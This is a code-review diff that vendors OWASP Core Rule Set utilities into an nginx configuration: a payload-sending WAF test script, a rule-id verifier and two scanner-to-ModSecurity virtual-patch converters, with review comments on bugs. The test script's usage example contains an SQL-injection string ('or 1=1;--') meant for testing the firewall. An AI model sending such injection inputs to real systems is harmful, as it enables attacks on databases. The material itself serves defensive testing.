+# +# The anomaly score envvar can be set as follows: +# SecAction "id:90101,phase:5,pass,nolog,\ +# setenv:ModSecAnomalyScoreIn=%{TX.blocking_inbound_anomaly_score}" +# +# Sample rule to setup the PL dynamically from localhost" +# SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \ +# "id:90102,phase:1,pass,capture,log,auditlog,\ +# msg:'Setting engine to PL%{matched_var}',chain" +# SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \ +# "setvar:'tx.detection_paranoia_level=%{matched_var}'" + +# Path to CRS rule set and local files +CRS="/usr/share/modsecurity-crs/rules" +accesslog="/apache/logs/access.log" +errorlog="/apache/logs/error.log" +URL="localhost:40080" +protocol="http" +while [[ $# > 0 ]] +do + case "$1" in + -c|--crs) + CRS="$2" + shift + ;; + -a|--access) + accesslog="$2" + shift + ;; + -e|--error) + errorlog="$2" + shift + ;; + -u|--url) + URL="$2" + shift + ;; + -r|--resolve) + resolve="$2" + resolve="--resolve $resolve" + shift + ;; + --protocol) + protocol="$2" + shift + ;; + -P|--payload) + PAYLOAD="$2" + shift + ;; + -h|--help) + echo "Usage:" + echo " --access \"/apache/logs/access.log\"" + echo " --error \"/apache/logs/error.log\"" + echo " --crs \"/usr/share/modsecurity-crs/rules\"" + echo " --url \"localhost:40080\"" + echo " --resolve \"someservername:40080:localhost\"" + echo " --protocol \"https\"" + echo " --payload \"/tmp/payload\"" + echo " --help" + exit 1 + ;; + esac + shift +done + +echo "Using CRS: $CRS" +echo "Using accesslog: $accesslog" +echo "Using errorlog: $errorlog" +echo "Using URL: $URL" +echo "Using protocol: $protocol" + +if [ -z "${PAYLOAD+x}" ]; then + echo "Please submit valid payload file as parameter. This is fatal. Aborting." 
+ $0 -h + echo "Examples:" + echo " ./send-payload-pls.sh -a /logs/test/access.log \ + -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \ + --payload /tmp/payload --resolve test.test.test.com:6443:192.168.0.128" + echo " ./send-payload-pls.sh -a /logs/test/access.log \ + -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \ + --payload 'or 1=1;--' --resolve test.test.test.com:6443:192.168.0.128" + exit 1 +fi + +# URL of web server + +# Rules per Paranoia level +# Paranoia level 1 rules, rule 012 is the delimiter of the start of PL1 +# Paranoia level 1 rules, rule 013 is the delimiter of the end of PL1 +PL1=$(awk "/012,phase:2/,/013,phase:1/" $CRS/*.conf |egrep -v "(012|013),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 2 rules, rule 014 is the delimiter of the start of PL2 +# Paranoia level 2 rules, rule 015 is the delimiter of the end of PL2 +PL2=$(awk "/014,phase:2/,/015,phase:1/" $CRS/*.conf |egrep -v "(014|015),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 3 rules, rule 016 is the delimiter of the start of PL3 +# Paranoia level 3 rules, rule 017 is the delimiter of the end of PL3 +PL3=$(awk "/016,phase:2/,/017,phase:1/" $CRS/*.conf |egrep -v "(016|017),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 4 rules, rule 018 is the delimiter of the start of PL4 +# Paranoia level 4 rules, "Paranoia Levels Finished" delimiter of the end of PL4 +PL4=$(awk "/018,phase:2/,/Paranoia Levels Finished/" $CRS/*.conf |egrep -v "018,phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +echo "Sending the following payload at multiple paranoia levels: $PAYLOAD" +echo + +for PL in 1 2 3 4; do + echo "--- Paranoia Level $PL ---" + echo + if [ -f "$PAYLOAD" ]; then + curl $protocol://$URL $resolve 
-k --data-binary "@$PAYLOAD" -H "PL: $PL" -o /dev/null -s + else + curl $protocol://$URL $resolve -k -d "$PAYLOAD" -H "PL: $PL" -o /dev/null -s + fi + + # Here are three ways to get the transaction unique id, + # the first one is Christian's format, second is Spartan's format, + # and the third one tries to guess which is the unique id using a + # regular expression, the first two require specific format. + # The automatic format detection may cause the script to malfunction. + # Uncomment only the required format. + # To use Christian's accesslog format uncomment the following line + #uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26) + + # To use Spartan's accesslog format (21 col) uncomment the following line + #uniq_id=$(tail -1 $accesslog | awk '{print $21}') + + # To use the automatic unique_id detection uncomment the following line + uniq_id=$(tail -1 $accesslog | egrep -o '\b[a-zA-Z0-9_-]{26,28}\b') + + echo "Tracking unique id: $uniq_id" + + grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Inbound and Outbound Score: [0-9]* [0-9]*/Inbound and Outbound Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/" + + echo + echo -n "Total Inbound Score: " + + # Here are two ways to get the transaction anomaly score, + # the first one is Christian's format, second is Spartan's format + # To use Christian's accesslog format uncomment the following line + tail -1 $accesslog | cut -d\" -f11 | cut -d\ -f14 | tr "-" "0" + + # To use Spartan's accesslog format (21 col) uncomment the following line + # To use a different column change the $NF value, e.g. $(NF-1) + #tail -1 $accesslog | awk '{print $NF}' | tr "-" "0" + echo +done diff --git a/nginx/config/owasp-crs/util/verify.rb b/nginx/config/owasp-crs/util/verify.rb new file mode 100755 index 00000000..6619fcbc 
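Review bot: `uniq_id=$(tail -1 $accesslog | egrep -o '\b[a-zA-Z0-9_-]{26,28}\b')` comes back empty whenever the last access-log line carries no 26–28 character token, and the following `grep $uniq_id $errorlog` then takes the error-log path as its pattern and blocks reading stdin; each iteration of the `for PL` loop should bail out first with `if [ -z "$uniq_id" ]; then echo "no unique id found in $accesslog"; continue; fi`. The unquoted expansions `$accesslog`, `$errorlog`, `$CRS/*.conf` and `curl $protocol://$URL $resolve` split on whitespace, so the paths and URL should be double-quoted. `while [[ $# > 0 ]]` is a lexical string comparison inside `[[ ]]`; `while [[ $# -gt 0 ]]` is what is meant. This looks like a verbatim copy of the upstream CRS utility, so the fix belongs upstream, or `util/` can be left out of the vendored tree since it is test tooling rather than rule content.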
--- /dev/null +++ b/nginx/config/owasp-crs/util/verify.rb 
@@ -0,0 +1,117 @@ +#!/usr/bin/env ruby +# -*- coding: utf-8 -*- +# +# Copyright © 2012 Diego Elio Pettenò +# +# Permission to use, copy, modify, and distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS +# ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES +# OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE +# CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL +# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR +# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS +# SOFTWARE. + +require 'set' + +seen_ids = Set.new +res = 0 + +# read reserved id range from the id-range file so that it can be +# configured on a per-repository basis. +range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i)) + +# open all the rule files +Dir.chdir("../") +Dir["**/*.conf"].each do |rulefile| + # read the content + content = File.read(rulefile) + + lineno = 0 + this_chained = next_chained = false + prevline = nil + + # for each line in the rule file + content.each_line do |line| + lineno += 1 + + # handle continuation lines + line = (prevline + line) unless prevline.nil? + + # remove comments + line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 } + + if line =~ /\\\n$/ + prevline = line.gsub(/\\\n/, '') + next + else + prevline = nil + end + + # skip if it's an empty line (this also skip comment-only lines) + next if line =~ /(?:^\s+$|^#)/ + + this_chained = next_chained + next_chained = false + + # split the directive in its components, considering quoted strings + directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten + directive.map! 
do |piece| + # then make sure to split the quoting out of the quoted strings + (piece[0] == '"' || piece[0] == "'") ? piece[1..-2] : piece + end + + # skip if it's not a SecRule or SecAction + case directive[0] + when "SecRule" + rawrule = directive[3] + when "SecAction" + rawrule = directive[1] + else + next + end + + # get the rule and split in its components + rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/) + + if rule.include?("chain") + next_chained = true + end + + ids = rule.find_all { |piece| piece =~ /^id:/ } + if ids.size > 1 + $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids" + next + elsif ids.size == 0 + id = nil + else + id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i + end + + if this_chained + unless id.nil? + $stderr.puts "#{rulefile}:#{lineno} chained rule with id" + res = 1 + end + next + elsif id.nil? + $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})" + res = 1 + next + elsif ! range.include?(id) + $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}" + res = 1 + elsif seen_ids.include?(id) + $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}" + res = 1 + end + + seen_ids << id + end +end + +exit res diff --git a/nginx/config/owasp-crs/util/virtual-patching/arachni2modsec.pl b/nginx/config/owasp-crs/util/virtual-patching/arachni2modsec.pl new file mode 100755 index 00000000..9b6a3c25 --- /dev/null +++ b/nginx/config/owasp-crs/util/virtual-patching/arachni2modsec.pl 
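Review bot: The `ids.size > 1` branch prints `rule with multiple ids` and `next`s without setting `res = 1`, so a rule carrying two `id:` actions still lets the script `exit 0`; add `res = 1` before that `next`, matching the other error branches. `Dir.chdir("../")` and `File.read('id-range')` resolve against the caller's working directory rather than the script's location, so the check silently only works when run from inside `util/`; `File.read(File.join(__dir__, 'id-range'))` followed by `Dir.chdir(File.join(__dir__, '..'))` would make it location-independent. This appears to be an unmodified upstream CRS utility, so either carry the fix upstream or drop `util/` from the vendored copy if the nginx deployment only consumes the rule files.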
@@ -0,0 +1,318 @@ +#!/opt/local/bin/perl -T + +############################################# +# -=[ Virtual Patching Converter Script ]=- # +# Converts arachni XML Output # +# https://github.com/Zapotek/arachni # +# # +# arachni2modsec.pl # +# Version: 1.0 # +# # +# Copyright 2011 # +# Trustwave's SpiderLabs Research Team # +# www.trustwave.com # +# # +# Based On Code Originally Created by: # +# The Denim Group # +# www.denimgroup.com # +############################################# + +use XML::Smart; +use Switch; +use Data::Types qw(:all); +use Data::Validate::URI qw(is_uri); +use Getopt::Std; +use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later + +############# +# Variables # +############# + +# [Configuration Vars] +my %param; +getopt("f",\%param); +$filename = $param{f}; +my $all_vulnerabilities_filename = "$filename"; + +unless ($filename) { + print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n"; + exit; +} + + +my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; + +# [End Config Vars] + +my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)"; +my $VULN_CLASS_SQLI = "SQL Injection"; +my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection"; +my $VULN_CLASS_LFI = "Path Traversal"; +my $VULN_CLASS_RFI = "Remote file inclusion"; +my $VULN_CLASS_HTTPRS = "Response splitting"; + +# Only the vulnerabilities in this array will have +# rules generated for them. 
+my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); + +my $num_rules_generated=0; +my $num_not_supported=0; +my $num_bad_urls=0; + +my $wait_for_keypress=1; +my $request_failed=0; + +my $all_vulns_xml; +my @type; +my @id; +my $vuln_count; + +my $num_attacks_flag=0; +my $num_attacks_noflag=0; + +# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +############# +# Main # +############# + +# Clean up env so perl doesn't complain +# when trying to run the restart snort +# script. +delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; + +$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); + +@type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name'); +@url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url'); +@param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable'); + +open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; +$MODSEC_RULES->autoflush(1); + +$vuln_count = 0; + +foreach my $current_type (@type){ + print "==================================================================================================\n"; + print "Vulnerability[$vuln_count] - Type: $current_type\n"; + + if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ + parseData(to_string($current_type)); + }else { + print "Vulnerability Type: $type is not supported in this version.\n"; + $num_not_supported++; + } + $vuln_count++; +} + +close($MODSEC_RULES); + +print "==================================================================================================\n"; + +print "\n\n************ END OF SCRIPT RESULTS *****************\n"; +print "Number of Vulnerabilities Processed: $vuln_count\n"; +print "Number of ModSecurity rules generated: $num_rules_generated\n"; +print "Number of Unsupported vulns skipped: $num_not_supported\n"; +print "Number of bad URLs 
(rules not gen): $num_bad_urls\n"; +print "****************************************************\n\n"; +print "----------------------------------------------------\n"; +print "To activate the virtual patching file ($modsec_rules_file),\n"; +print "copy it into the CRS \"base_rules\" directory and then create\n"; +print "a symlink to it in the \"activated_rules\" directory.\n"; +print "-----------------------------------------------------\n\n"; + + +############### +# Subroutines # +############### +sub parseData +{ + my($vuln_str) = @_; + my $vuln_detail_filename; + my $current_vuln_xml; + my $current_vuln_url; + my $current_vuln_param; + my $current_uricontent; + my @current_params; + my $id = $vuln_count; + + print "Found a $vuln_str vulnerability.\n"; + + $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); + $current_vuln_url = $url[$vuln_count]; + + print URL_LIST "$current_vuln_url\n"; + + # Validate url (need separate sub?) + print "Validating URL: $current_vuln_url\n"; + if(is_uri(to_string($current_vuln_url))){ + print "URL is well-formed\n"; + print "Continuing Rule Generation\n"; + } else { + print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; + $num_bad_urls++; + + # Waits for keypress in test mode so you can + # see why the URL failed validation. + if($test_mode){ + wait_for_keypress(); + } + return; + } + + $current_uricontent = get_uricontent($current_vuln_url); + + + # Only need param if XSS attack,SQLINJ,XPATH + # and maybe for HTTPRS, DT. 
+ # NOT for PRL and DI + + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + @current_params = $param[$vuln_count]; + + } + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + print "Current vulnerable Param(s): @current_params\n"; + } + + generate_patch($vuln_str,$current_uricontent,@current_params); + + +} + + +sub generate_patch +{ + my($type,$uricontent,@params,$current_vuln_xml) = @_; + my $rule = ""; + $id = "1".$vuln_count; + + switch($type) + { + case ($VULN_CLASS_XSS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + # Check to see if each vulnerable parameter is valid + # then generate a rule using both uricontent and the + # parameter + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + } + } + } + } + + case ($VULN_CLASS_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" 
\"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_BLIND_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_LFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully 
generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_RFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_HTTPRS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + } +} + +sub get_uricontent +{ + my($url) = @_; + my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; + + # First, trim the first part out of the URL: + # http://.../ + $url =~ /$regex/; + substr($url,index($url,$&),length($&)) = ""; + + # If the URL contains a php or cgi query with + # one or more params and values, trim those out. + # Trim from the question mark to the end. 
+ if($url =~ /\?/){ + substr($url,index($url,"?")) = ""; + } + return $url; + +} diff --git a/nginx/config/owasp-crs/util/virtual-patching/zap2modsec.pl b/nginx/config/owasp-crs/util/virtual-patching/zap2modsec.pl new file mode 100755 index 00000000..03fa21e0 --- /dev/null +++ b/nginx/config/owasp-crs/util/virtual-patching/zap2modsec.pl 
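Review bot: `generate_patch` interpolates `$uricontent` and each parameter name (`$_`) straight from the scanner report into the generated `SecRule` text, so a URL path or parameter containing `"`, `'`, `,` or regex metacharacters breaks out of the rule string or changes what `REQUEST_FILENAME` matches; both values should be checked against an allow-list pattern (e.g. `m{\A[\w./-]+\z}`) or passed through `quotemeta` before being written to `$modsec_rules_file`. Several names are never declared because the file runs under `-T` without `use strict; use warnings;`: `$VULN_CLASS_PRL`, `$VULN_CLASS_DI` and `$test_mode` in `parseData` are always undef, `print URL_LIST` writes to a filehandle that is never opened, the unsupported-type message in the main loop prints `$type` instead of `$current_type`, and in `generate_patch` the array in `my($type,$uricontent,@params,$current_vuln_xml) = @_;` swallows the rest of `@_` so `$current_vuln_xml` is always undef. `get_uricontent` only strips an `http://host/` prefix, so findings reported over https keep scheme and host in the generated `REQUEST_FILENAME` pattern and will never match. The file looks like a verbatim copy of the upstream CRS utility (it also pulls in the `Switch` and `Acme::Comment` source filters), so the fixes belong upstream, or the `util/virtual-patching` scripts could be omitted from the vendored tree given they are offline tooling rather than rule content.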
@@ -0,0 +1,318 @@
+#!/opt/local/bin/perl -T
+
+#############################################
+# -=[ Virtual Patching Converter Script ]=- #
+# Converts OWASP ZAP XML Output #
+# https://code.google.com/p/zaproxy/ #
+# #
+# zap2modsec.pl #
+# Version: 1.0 #
+# #
+# Copyright 2011 #
+# Trustwave's SpiderLabs Research Team #
+# www.trustwave.com #
+# #
+# Based On Code Originally Created by: #
+# The Denim Group #
+# www.denimgroup.com #
+#############################################
+
+use XML::Smart;
+use Switch;
+use Data::Types qw(:all);
+use Data::Validate::URI qw(is_uri);
+use Getopt::Std;
+use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later
+
+#############
+# Variables #
+#############
+
+# [Configuration Vars]
+my %param;
+getopt("f",\%param);
+$filename = $param{f};
+my $all_vulnerabilities_filename = "$filename";
+
+unless ($filename) {
+ print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n";
+ exit;
+}
+
+
+my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf";
+
+# [End Config Vars]
+
+my $VULN_CLASS_XSS = "Cross Site Scripting";
+my $VULN_CLASS_SQLI = "SQL Injection";
+my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting";
+my $VULN_CLASS_LFI = "Path Traversal";
+my $VULN_CLASS_RFI = "Remote File Inclusion";
+my $VULN_CLASS_HTTPRS = "HTTP Response Splitting";
+
+# Only the vulnerabilities in this array will have
+# rules generated for them.
+my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_SQLI_FINGERPRINT, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); + +my $num_rules_generated=0; +my $num_not_supported=0; +my $num_bad_urls=0; + +my $wait_for_keypress=1; +my $request_failed=0; + +my $all_vulns_xml; +my @type; +my @id; +my $vuln_count; + +my $num_attacks_flag=0; +my $num_attacks_noflag=0; + +# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +############# +# Main # +############# + +# Clean up env so perl doesn't complain +# when trying to run the restart snort +# script. +delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; + +$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); + +@type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert'); +@url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri'); +@param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param'); + +open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; +$MODSEC_RULES->autoflush(1); + +$vuln_count = 0; + +foreach my $current_type (@type){ + print "==================================================================================================\n"; + print "Vulnerability[$vuln_count] - Type: $current_type\n"; + + if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ + parseData(to_string($current_type)); + }else { + print "Vulnerability Type: $type is not supported in this version.\n"; + $num_not_supported++; + } + $vuln_count++; +} + +close($MODSEC_RULES); + +print "==================================================================================================\n"; + +print "\n\n************ END OF SCRIPT RESULTS *****************\n"; +print "Number of Vulnerabilities Processed: $vuln_count\n"; +print "Number of ModSecurity rules generated: $num_rules_generated\n"; +print "Number of Unsupported vulns skipped: 
$num_not_supported\n"; +print "Number of bad URLs (rules not gen): $num_bad_urls\n"; +print "****************************************************\n\n"; +print "----------------------------------------------------\n"; +print "To activate the virtual patching file ($modsec_rules_file),\n"; +print "copy it into the CRS \"base_rules\" directory and then create\n"; +print "a symlink to it in the \"activated_rules\" directory.\n"; +print "-----------------------------------------------------\n\n"; + + +############### +# Subroutines # +############### +sub parseData +{ + my($vuln_str) = @_; + my $vuln_detail_filename; + my $current_vuln_xml; + my $current_vuln_url; + my $current_vuln_param; + my $current_uricontent; + my @current_params; + my $id = $vuln_count; + + print "Found a $vuln_str vulnerability.\n"; + + $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); + $current_vuln_url = $url[$vuln_count]; + + print URL_LIST "$current_vuln_url\n"; + + # Validate url (need separate sub?) + print "Validating URL: $current_vuln_url\n"; + if(is_uri(to_string($current_vuln_url))){ + print "URL is well-formed\n"; + print "Continuing Rule Generation\n"; + } else { + print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; + $num_bad_urls++; + + # Waits for keypress in test mode so you can + # see why the URL failed validation. + if($test_mode){ + wait_for_keypress(); + } + return; + } + + $current_uricontent = get_uricontent($current_vuln_url); + + + # Only need param if XSS attack,SQLINJ,XPATH + # and maybe for HTTPRS, DT. 
+ # NOT for PRL and DI
+
+ if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){
+ @current_params = $param[$vuln_count];
+
+ }
+ if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){
+ print "Current vulnerable Param(s): @current_params\n";
+ }
+
+ generate_patch($vuln_str,$current_uricontent,@current_params);
+
+
+}
+
+
+sub generate_patch
+{
+ my($type,$uricontent,@params,$current_vuln_xml) = @_;
+ my $rule = "";
+ $id = "1".$vuln_count;
+
+ switch($type)
+ {
+ case ($VULN_CLASS_XSS)
+ {
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ # Check to see if each vulnerable parameter is valid
+ # then generate a rule using both uricontent and the
+ # parameter
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_SQLI)
+ {
+
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
